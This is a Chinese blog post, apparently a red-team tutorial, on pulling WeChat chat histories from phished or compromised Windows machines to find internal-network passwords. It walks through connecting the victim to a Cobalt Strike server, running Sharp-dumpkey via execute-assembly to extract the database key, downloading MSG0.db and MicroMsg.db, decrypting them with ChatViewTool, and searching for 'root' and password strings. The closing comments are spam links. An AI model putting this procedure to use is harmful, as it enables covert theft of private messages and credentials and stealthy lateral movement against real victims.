侧边栏壁纸

钓鱼场景微信聊天回传

2024年06月07日 829阅读 4评论 2点赞

实战中钓⻥时常在微信聊天记录中找到目标内网系统账号、机器账号密码,尽可能的不触发大量扫描告警下在内网中精准打到跳板机。

一、使用场景
钓⻥攻击(通过钓⻥ / 微信控到的机器通常都是登录状态) 渗透到运维机器(有些运维机器会日常登录自己的微信)

二、获取微信聊天记录过程 在第一步需要用到,Sharp-dumpkey工具,下面对Sharp-dumpkey工具进行介绍:

项目地址:

https://github.com/Ormicron/Sharp-dumpkey

基于C#实现的获取微信数据库密钥的小工具,可配合chatViewTool使用。 可直接执行命令.\dumpkey.exe,查看微信数据库密钥,并回传DBpass.bin文件 中。
lx4f31g6.png
lx4f3aw3.png

暂时不支持微信多开场景的密钥获取。
需微信登录后才可抓取密钥。
程序未采用动态获取基址的方式,因此为保证程序可用性,运行时会在线拉取基址。

在被获取权限PC端执行 .\co.exe shellcode -f .\cece.txt,可连接到CS服务器

lx4f5d69.png

在被获取权限PC处,右键选择Interact,可进入命令执行

lx4f5q6p.png

lx4f5yez.png

lx4f66tr.png

lx4f6gg9.png

1、获取微信数据库密钥,执行命令

execute-assembly C:\Users\summer\Desktop\test\dumpkey.exe

lx4f8er2.png

回传 DBpass.bin,该文件中记录了微信数据库密钥

lx4f8tuk.png

2、下载目标聊天数据库文件,默认保存目录在以下目录,超出 240MB 会自动 生成 MSG1.db,以此类推。

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db 
C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db

备注:
MSG0.db文件存放聊天记录
MicroMsg.db文件存放好友列表

执行命令

shell C:\Users\summer\Desktop\test\FileSearch.exe search C:\ MSG

可找到文件MSG0.db

lx4fal4s.png

连接被获取权限PC的文件夹,找到目录

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi

下载文件MSG0.db并存放到自定义目录 即可

lx4fbike.png

找到目录

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg

下载文件MicroMsg.db并存放到自定义目录 (与MSG0.db放到同一目录下)

lx4fc9ub.png

在第3步之前对ChatViewTool工具进行介绍: 项目地址

https://github.com/Ormicron/chatViewTool

ChatViewTool是一个配合dumpkey(微信数据库秘钥获取工具)使用的小工具,该 工具实现了微信数据库解密以及展示数据库聊天记录的功能。

lx4fcyw8.png

使用方法
在获取数据库秘钥之后将内容保存为文本文件DBPass.Bin,随后提取以下相关 的数据库放于秘钥文件同目录。

C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db
C:\Users\summer\Documents\WeChatFiles\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db

随后打开ChatViewTool点击“数据库解密”并选择秘钥及数据库所在的目录,待解 密完成后

lx4fe8sp.png

点击查看数据库,选择同目录,双击联系人列表即可展示对应的聊天记录

lx4ffqwk.png

将上面DBpass.bin、MSG0.db、MicroMsg.db三个文件回传到同目录,配合 ChatViewTool 打开解密即可查看,在搜索处 “administrator” “root” “密码” “ip 等”,项目地址。

lx4fhxso.png

2

—— 评论区 ——

昵称
邮箱
网址
取消
  1. @
    头像
    pitmedyuwi
    Windows 10 x64 Edition   搜狗高速浏览器

    《如果没有你2013》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/6322.html

  2. @
    头像
    wuyrjpnldg
    Windows 10 x64 Edition   搜狗高速浏览器

    《化妆界明日之星第四季》欧美剧高清在线免费观看:https://www.jgz518.com/xingkong/98160.html

  3. @
    头像
    ffgzbxyajf
    Windows 10 x64 Edition   搜狗高速浏览器

    作者的才华横溢,让这篇文章成为了一篇不可多得的艺术品。

  4. @
    头像
    gsxlzgghhk
    Windows 10 x64 Edition   搜狗高速浏览器

    作者的情感表达细腻入微,让人在阅读中找到了心灵的慰藉。